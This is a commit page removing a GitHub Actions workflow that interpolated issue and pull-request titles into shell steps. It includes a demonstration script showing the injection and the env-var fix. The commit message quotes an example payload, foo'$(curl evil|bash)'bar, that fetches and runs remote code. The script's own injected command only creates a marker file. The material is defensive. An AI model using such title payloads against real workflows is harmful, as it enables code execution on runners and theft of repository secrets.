Commit 2d3544a
security: remove vulnerable create_pylon_issue.yml workflow (#2207)
This workflow interpolates `${{ github.event.issue.title }}` and
`${{ github.event.pull_request.title }}` directly into `run:` shell
steps. The surrounding single quotes around the curl `--data` payload
do not protect against a quote-breakout in the title (e.g.
`foo'$(curl evil|bash)'bar`), giving any GitHub user code execution
on the runner with the workflow's GITHUB_TOKEN, PYLON_API_KEY,
PYLON_ACCOUNT_ID, and PYLON_REQUESTER_ID.
The trigger surface is broad: `issues: opened` lets any user trigger
it by opening an issue, and `pull_request_target: opened` runs in the
base-repo context with access to base secrets against fork-controlled
input.
Removing entirely for now; the auto-create-Pylon-ticket behavior can
be reintroduced later with env-var indirection for user-controlled
fields and an author_association gate.
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
1 parent edd283c, commit 2d3544a
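The breakout described in the commit message can be reproduced outside GitHub Actions, because the mechanism is simple: the runner substitutes every `${{ ... }}` expression textually into the `run:` script before the shell ever parses it, so single quotes written around the expression are just characters that an attacker's title can close and reopen. The script below is an added example, not the deleted workflow or any code from the project. It renders a vulnerable step and a hardened step from a constructed attacker title, executes each the way the runner would, and checks whether the injected command ran. `curl_stub`, `render_vulnerable`, `render_hardened`, `ISSUE_TITLE` and the marker file are all assumptions for the demonstration; the injected command only touches a file instead of the commit's `curl evil|bash`.

```shell
#!/bin/sh
# Added example (not from the page's repository): simulate how a `run:` step
# that interpolates ${{ github.event.issue.title }} gets injected, and how
# env-var indirection stops it. All names and the title below are constructed.

# Constructed attacker-controlled issue title. The commit's real payload was
# foo'$(curl evil|bash)'bar; ours just creates a marker so we can detect execution.
MARKER="${TMPDIR:-/tmp}/issue_title_injection_marker.$$"
ATTACK_TITLE="foo'\$(touch $MARKER)'bar"

# Stand-in for curl so the example runs offline; it only echoes its arguments.
curl_stub() { printf '%s\n' "$*"; }

# The vulnerable pattern. In YAML this was roughly:
#   run: curl ... --data '{"title":"${{ github.event.issue.title }}"}'
# The runner substitutes the title into the script text; this function does
# the same substitution, so $1 lands between the single quotes as raw text.
render_vulnerable() {
  printf '%s\n' "curl_stub --data '{\"title\":\"$1\"}'"
}

# The hardened pattern (env-var indirection). In YAML:
#   env:
#     ISSUE_TITLE: ${{ github.event.issue.title }}
#   run: curl ... --data "{\"title\":\"$ISSUE_TITLE\"}"
# The expression is expanded into an environment variable, never into the
# script text, so the shell sees the title only as a variable's value.
# (JSON escaping of the value is a separate concern; use jq or similar.)
render_hardened() {
  printf '%s\n' 'curl_stub --data "{\"title\":\"$ISSUE_TITLE\"}"'
}

# Execute a rendered script as the runner would, then report whether the
# injected command created the marker. Returns 0 if it did.
run_step() {
  rm -f "$MARKER"
  eval "$1" >/dev/null
  if [ -e "$MARKER" ]; then
    rm -f "$MARKER"
    return 0
  fi
  return 1
}

vulnerable_step_executes_title() {
  run_step "$(render_vulnerable "$ATTACK_TITLE")"
}

hardened_step_executes_title() {
  ISSUE_TITLE="$ATTACK_TITLE"
  export ISSUE_TITLE
  run_step "$(render_hardened)"
}

if vulnerable_step_executes_title; then
  echo "vulnerable step: attacker command ran on the runner"
fi
if hardened_step_executes_title; then
  echo "hardened step: attacker command ran (unexpected)"
else
  echo "hardened step: title stayed data; no command ran"
fi
```

Env-var indirection removes the shell injection but, as the commit message notes, the trigger surface is still `issues: opened` and `pull_request_target: opened` from any GitHub user; the `author_association` gate it proposes is an `if:` condition on the job or step, for example `if: contains(fromJSON('["OWNER","MEMBER"]'), github.event.issue.author_association)`, so the step does not run at all for untrusted authors.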
1 file changed
Lines changed: 0 additions & 72 deletions
This file was deleted.